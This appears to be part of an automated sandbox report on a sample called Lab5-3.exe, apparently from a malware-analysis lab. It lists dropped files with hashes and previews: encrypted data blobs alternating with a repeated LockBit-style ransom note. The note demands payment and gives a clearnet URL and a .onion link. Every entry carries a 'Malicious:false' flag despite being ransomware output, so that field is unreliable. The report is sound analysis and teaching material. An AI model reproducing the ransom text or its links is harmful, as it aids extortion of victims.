                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6032
                                                                                                          Entropy (8bit):7.971619710534015
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:ximCSwrLqVGh00TNaNr9XThSxzHZGkk+0Z/xaAeKPMIzuZxhGx0uKeY2ElUJ:MmN0aNE5zB0ZI2BzuS0Cb
                                                                                                          MD5:B3B211927D721849AFB37D77EBC5F942
                                                                                                          SHA1:F506C5F3DE17E01A4A16A3F8DCC65419340EA6DC
                                                                                                          SHA-256:122C9CFBC3786E016E1F621780D63823B1F9E88810A731A3EC45B98C44118C48
                                                                                                          SHA-512:4963EBC2CAB0D279D3B133BAEBE7D3B094B3F4FA0856BD7A641544180B4C085DBF9ED95446271C7ECAF45EEB24CD9C154C1231F56F211E2E1D246CC28A2524E5
                                                                                                          Malicious:false
                                                                                                          Preview:>..AGv..x.iI&L..#.%..z<.:5..,.."....;.(O)h2....e.Z.g..q.&G...t.yy. }S.+..`.Vt....X..*T@3...T.~C|...(9.#.?H>...m...Z..,.......g.....z.h ....y]...].$.T.u~..'..G&{..8).b]......tp5.+SU...at&..7.....UpB.....)..M.;u...i.{`...#.J.......3.....k.. .Pj.0P.O.a..e.^GT.?...Y...k.......k .../..m...K.Z..y.^K.....>.B..i.n..R....-'.8.8....fX..j.U.o...>...<...u...Q...?E..C.;H.z...P...!.`.r..wH.{#.I.S49-..E..v.]aY.U"..-..f.(..?.m....R.....aC@uX".z.....Zy...L..M..f.)-J..w.*.Sr..12._.).t.4^..,4.p..5...'O....d9...&].._CKA......{..p..k.6...5.M.v....a.Z..j......\q*HP-.u.(.7...m[.n.z%56M.A..r.[.f(F.CT m......./.....#..A.+.u.M....j,...8.tI...}......../..........&ty...R.$.....sl..........<.@.,...DF.............:..."w=.|!.x?.%..Z......K:...P..v.DN...........<..Z.P.n..6.....<.+.%V..5v....ih...Z..Y..3.....z...C..&K.. -.q.0;;..?....z.|.\...Uo.d.w,m..j._......p..2...g..6.P.y.....O........7A.>..a.3?Q}..%.:....S[z.N.b..'3......c..;..1m..7.L...).M}...>*...Gb..w..]1cV~.....7#nu
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5536
                                                                                                          Entropy (8bit):7.968068423071182
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:TdnZdFYDwfsGe0RVf1BCo5sBX5QiyfBapySvVYEhGx0uKeY2ElUJ:hZ3AwrRVf1BCoGZ5QRpapDA0Cb
                                                                                                          MD5:70D759126761E4BE78EEE8F9A0AC1647
                                                                                                          SHA1:46DF5B501546FA3A83C35501A63D81F69E203540
                                                                                                          SHA-256:94F58B3EE6C56839F5CA274E40E16A0605C995EDC175C43EFD0678CBC79C405C
                                                                                                          SHA-512:85C184596C886FEA1931ED7A02D4A1ED03A43CC9CBC96003B63440A11E6F56AE8F626553126F9A6FB8ED16A9E49ED930D246F8470651D99987F619DDB7A161F5
                                                                                                          Malicious:false
                                                                                                          Preview:.OE.......x.$K<.^^_T...A..s..m.m.@i.9C.'[#=4......l.x.Of&$3!WM..w.bt...j_....1jk..4......."3..s]a...a2.k....9I4..1..x.2.a.b...;....e..#v...W.S.......]y7.A.@.k.]....i~..g.A...+*P.3..C.?1W0.~..s...?$..BN.....>.#...g:y.gH=5$a..K.........5..V....B......<...9.IC.......>.C....Bj!_.w..x....P$.5..eO.....+.^.M)M....4b.L....%.e7v.[...*....=.Z.B..I.9....2..H...z.u.h.Ee(.C....t."cK.Q.N...J.q<..7..A.G.P... .%.`..k..I.....e.Y....V5}..5{.f..8........B.....(.g....0.Or..:X...Q.z....g..R.7.....-L.YI.......g....<.w.......6.........4.9..-u....\....~4..K.....A.:e....U.5.kN...G...|P}wXw.[.K\.l.m...m...u`..G3......o"..u...7.....u........~~..../..[7~Fk.<...c.).T...Ja.........N.S..=.z.E5.pw..^L..yx.........'..........R3..l\....<.........j1.B>....0P~.....z.LI.J....Z..AM.r..y.....OXGC........q.N8.Z.......|......o.../].L`.5k....<..A..Y%.O......9...V.....6EC...c.....z..lf.U......(....l4T.].%.....*.b.. @I./...hi.........0N...).cG......f..=..qs..~.-.#{.....J5..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5536
                                                                                                          Entropy (8bit):7.966618453918406
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:HV4jZhVzlKEOTp3GBJNNSyY0WAzMrcQ2q7fm9gSDWcGk2qLkDPhLGx0uKeY2ElUJ:HORzITp3iEysvrTm9gS5GjPh40Cb
                                                                                                          MD5:C91E7944049EF5C3E306ED7977CA1F31
                                                                                                          SHA1:CD2E4B446C953816CC6D1B956934597750953F0C
                                                                                                          SHA-256:D60D2BC66E365750B4DCDE4413A8465C4ADE272AADDCD40C4716B8E5F6A45C3C
                                                                                                          SHA-512:A7E88049C315C54B112B269DCBE572000D850D8A1EE78F76649F63E99A480FCFAE47D9F31C751360A2890796A2CBAB385690E180D86A741E77255D68E0A6BF2D
                                                                                                          Malicious:false
                                                                                                          Preview:k....a.X.. .u........R..e....g&\l...KaxwF.a......r..9.l?4`.U.r....o.~~H..z...6.......5.....zP.f.@.....q.7......wc.M..1Zj.0(y..= .|..p...9.}.ER.`\...].K....q.U.DvM..\..m.6.7..5.X...$SU...g$.U..(8....../...I5...g..T.9e....e.FF>\R....C.*z.6.S.%.WY&..kc.5...V.?.0[.D.....X.....@|k.,.&..S...c.*M1s.8}....!.1,$.[$.zVs....J.j.c..PI.l[*........}G.g.7S.R:.J.r.).....z+...M.....7.=q..A%.l.....+..5..T.....p .~...C.;'.G..CU."f:.oiVCo.D..$^c.f..........T.....5.....P.*R..ibSD...k&......`.tD.S..q.@.T.........N,. ........E.o..p..).&.....i.f.~.2.U...o>%.t.....U....'u.....op......~..LrH....VM.:.x...K.}...._.R.m.NS[...`.|4..s......2...}m=....q..E...:N8l..a6.u..... .....m..X>.T.L............S095Q..0I{.{....QR.\......{.}n9lmVl.:..'.8)\U.z.x..&W. . .MX..?....X....q......C.C..6e...-..t..Q5...cs.f,.t&../"...L^O.B8..... .RYx...d...1..I...........+.|..H2....J.o....xl8..)n..t.Wz....h......gn..8.....EhKF0....=eL....q......<>.+....;.E....|..\x.t!.[:..`...Q{..ca.4..ih.B. i6
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6096
                                                                                                          Entropy (8bit):7.971661033121646
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:1vhihUwU4Lx7xRomvdugk89G3NuYJ53+xZBacNBQMYEAW323O05qdSAGx0uKeY2b:1pRwU47RoO/G9uYJ5OTVWMYEAy2e0Mdo
                                                                                                          MD5:DCCC634DF6FCF4FE73023D1E3B65C632
                                                                                                          SHA1:E313B566765BE63369B50967586631610686CAB2
                                                                                                          SHA-256:593859FB9B6BC19BA8CECD84ACF0BF2EE144AE859EA83DF5C5A315D883227BFF
                                                                                                          SHA-512:7B55498127A92C75D525358138A9E7FEACED8AF1E9CB99DD53402125587784B9569DC699410A93C3A9556FCE65FDF5CA8E0520C5B8AB2035203376DE5DC54330
                                                                                                          Malicious:false
                                                                                                          Preview:^B..h.IG...Q."......vH.........8.Y............J...K}.bh.(zo*...^>.j...h.mTD.g.=..........CF^.....I.p=7.,..P.....2....uV.b..*.U.%..'...5.....-n=...?..u.c.{...G.m.....".-?.e..b.l..+...[..H.|.k=..~h........./...6....>2.Zl6I.....njb\C.7Xz1.&7.bc{Fc.t..g+...........)..8..R.....e.==.d.O......N...`<.N .28W.........2.b..4...B.4.EP...&h?..^..}.Q..z.[^V..._k.+g.._Z...B,....j...^.j^....;.c....w....T.$RDDS....`..v.A.(M.'$f9.N...}.L.....<..c...r..4Y.Z.Q..H.@.n_..0..b..f..S.$z.%`Q%.........a.M....*.... .j0e...1.....s....(Qq.H.z.F....fX`h...-.8.n.C...K..rJ.Eb#n"..T....9.(,&..~...T... `.o....A....yo. ........2.8....3e...dO.wj..1...]...RJ...;S...`v.....y.&.0.7.oPHYj...-......nkc..S.PQ(...1....gz.:.}s.*....K.".._$...g........:aqb.U..'C..{k....V.?...|...8W~......M.m.V*.N.,.).\...<@}.x...u~......b..&.W...#yE.gCF..W.-..6..V....l9.3.Bo.#.49....-..Z.l3.+..OX_2..."`..5_/*.. .x8.~..W.....v.....v...>..+ ...:2..p.n=.dG.}lk..._!.s.D;.[.zv..%........x..V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6000
                                                                                                          Entropy (8bit):7.969812965338685
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:SfG5RXQSwhFP3l32jjIevcTMq/PsdvH9UKPgfBtbNK9pEPuXNGx0uKeY2ElUJ:SfGfyFPlGjjIrTxVagDNYyWm0Cb
                                                                                                          MD5:55F449CDB57C373151FCD51B52ECF4F0
                                                                                                          SHA1:9B0EC278EEE201984072CF77FC0B5F4EF63AC380
                                                                                                          SHA-256:680DE4BB4E1A94763C8B872A1E3AB55658B0D6E1DB4EC6398C069C460B5DD188
                                                                                                          SHA-512:550B1CDE12270F10ECB04C6F4525FD59B56A90264D09683327B9E58098D178273BCD2019C2BD853CE825DD4D1B999FC6243658F190B83A95CC6F35FA1A7FEAF5
                                                                                                          Malicious:false
                                                                                                          Preview:...cE..<1.D=....-..J..~....l."G.......:.B...r.5N.....Z...d^.C...d*..=........#.O.......O^..p.k./.Q.J.kC9........~|J\..U;E.1Ama..@.v.PV......9...E....Y?c....U:.mB..Vev....%X..>d..=...y..\..&..i.QQ~.Vt.c......9T.u..?<H...=.......].FfA8D.k.x....:.ki'.....@.-..q./....RmK....N.B@"$M.....2t.1...3....1..HH....f2..^......+._O_.0.HF,.....%...-.2...../.........#'hA*..Is.US.....U..Z.P.<...d&.7.;*.....P..i.%(.t.....ya-...8I...K.F.._......\..k.#..>..k..KtU/..-.wn.)..,..x...0.! ..y.~67..U...!.b.2.w. @4.."..B.......b.S .+$9:.ul....!...YLT..'./.e.)X...(],....'..X.3..l......Z.o..a"...`_m....T.u.)O..R..B["..wB..8...J....._-z .... .=...3q......X......).>xx'G...l).z.\M...[D.fr0.K..B.k...n..xL^..od....K.6....W....E....G:dZ......h{9...~...Nh.M./\'....N6w..6...l...,....i-.)..[4.kCX.a..D*.d!.....#.p._...dsY!....,....j.l?-f@o.h.....y...I....<%..a.xZ....n.p..D.a%.aW...[%..2u._.y.....%.d0. Aa.H.P.....3*89?B.....^..".|.W.D........t.2W...E......D._e....J.E.`
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6016
                                                                                                          Entropy (8bit):7.973877288810712
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:lKXX3nAFrYEulNOmwaiC9IOUdkMTyX4/bOQYXq0kAUWi9kVJjDc2PMaYKrGx0uKk:M3klqgc9viTyoThYXqchncwc0Cb
                                                                                                          MD5:D3901294556D7A2DEA0B1255A5727221
                                                                                                          SHA1:6F4E5F8059993D314D62B68A7A26B06A6756253F
                                                                                                          SHA-256:6E766E3AD5F552582064A8BB9A3B93873F3E51F805EDF7D94546725479EC2FF6
                                                                                                          SHA-512:65029B495E7314AA88E216060CD7470252587147E16F1E51D041255270400AEDF1D87E6A261AEB9F66326BAF6C4C2E68D704E10449A4E40C2EC5D49645A1A991
                                                                                                          Malicious:false
                                                                                                          Preview:...H&`...c...e?v...@...{.H.%.Xh.S...\l..0.G......q"6^.o....6.1...G=.Ry3. b.Y.mM.O...M...x...].P.+.z...IP.).~-d..$.h..q.@....!c(C/.w....O'.("].....".x.Q......z..mR..^.t.S.....Av.n..`.*b.gC...8...C.....j.].G..... TL.d*..........8......a.../...7.!....g..O..P...w(..ja..<.!..]..m..B.!.d.Q.X.}..H...)..k.u.B.eT&X__..y.51......,>.B.~.|...P..Z...v@.{..=..BTBv...CDk...w]...!.H.....Q..z.cv.B...........!.!....O]...u.x....,..H........T..oa...g.)..q...ld..im\..6..TV:.o.\....Qm-4...~.?._.g.a.`L9A-L..l....h..i (K..^*.M.].M........mr.?cX5Pl...L..g#e.y.R'...?..}..H....K....C.%u..s...>.w...............C.kN..S.'."{L.....&Sz.B...Kx .A.bz".P..N.=..U&.^U.....}VT.x.....F...Yt...<-g..X..$w..D}4.i.v.3.y... .ri..........=.R..4C|.0..=3.w|.........E.1.<s.+..........[.;..%E.+.*.g...:.G.4X..a]a[AZ..s._...U......`.....x....D..).......\Q8....0....K...#..D.G...^....(S&.....k..,.Y..S"...)..,.?..Qz..w$..lrw:...Jf.*.WQ......@..._....%.....JV..">1.B4!.`...r^5:f=4....X7..C..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6288
                                                                                                          Entropy (8bit):7.973324831667901
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:b3ET9qVbLIO/lCeBItVIkal11RiIDxojmag63sYdjGx0uKeY2ElUJ:lBjk0i+Wjmow0Cb
                                                                                                          MD5:D6D272AD755E1AB4F6206CAADC688C55
                                                                                                          SHA1:23EBADCFD133BB45587E2FCEA9FB19A0B62706AD
                                                                                                          SHA-256:DDFE6F67D53DD4E74F50A71D4698EC0848636138F81729FA274E072E171E60E6
                                                                                                          SHA-512:A8C20555F67DBB0E22EFCC31452AC287FCCEB826C8C949DF62DCD8DE0497A90B7FC9BCB1896980E7C67B4013E111AB3CBFDA03378B1E612961DCD5D237E2D02E
                                                                                                          Malicious:false
                                                                                                          Preview:|.Qq.2..'.3...Z.Q..W.t.>...\.n...]iF2_..)l. }..~..n............v.-...y..T@OpC.$.yU..-...........N..P,.>I..W......__........>.u.u.N{.Jg......O.J.g..S..7.....RT..j(.....Wi.JT....].'2..g..(n.S.....j..Tb9./.5..i.<.(v#+....Z..&...W..a.w.L...:%........UG..fP..Ly.>?...........j.'.H..R7T...c...!<`xQ.rN.\....wm.......q<W.!C.du.zU..~..h&.._....\....ri..N.`..s..6dQ.B."g.ZZ.G.u..Wg~`N.Z.3....{....U...Q...|R.....;.W..`&.%^K.%..}../..92..P..........~!..../T.-.R..$|........{....v.70..Q..d......;.s.E..xj2.al.....\)..b\l..._.~..x"....0''.T..+..V.~..g<.............X.J.?O..[g.6.'.K.r.....J...U[..%..?...0..m.....lXP..OB.tC*.....r#.(.....*t...M...].2K.'......s.......V.,.y.4q.<.!..c6^/B...+....W...Z.5...........o.....Gi.......c%W.$...dw.'..n....5.u...=....rW#$8...s.v.u.O...n......Q!..3,....|.,.o<,_.....`=.%~...^PH.4.x.'........H};J..!K`.*......V`......@O...l`.y/ ..-#.}.H.qK...#..WXF7.G..Z.@..qCFp{..R.8.R....#....|...dj.T.....k4.q..C.../.....7..s.u.A.~..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6288
                                                                                                          Entropy (8bit):7.9722761425040645
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:uQLVW9Dp5irZKCu0uVE/Y97enWhH7nxlqtC6s7YVKMZW7PLuCskNGx0uKeY2ElUJ:uyVMpoKCu7eA97esbTqtC6Nq7dsr0Cb
                                                                                                          MD5:E7816B22E54A2F5CC0AA23AF35DB37F6
                                                                                                          SHA1:75D7B91BF35B3E46B537B7724CBAE2709D6F0F34
                                                                                                          SHA-256:D24BD426279861B18546BF9800E8AD2D8A15B9A4853E6AFC639D61991E2461E7
                                                                                                          SHA-512:5267F5371E5FCB230FD9FDA3CEB6DF0EA5BD6E0E1A450EE07B0E38D095FC34879652EC9C468BC56044A8E0A0BFDB7CF05CA154CFF2193FB40DC86C9D6AFD72D0
                                                                                                          Malicious:false
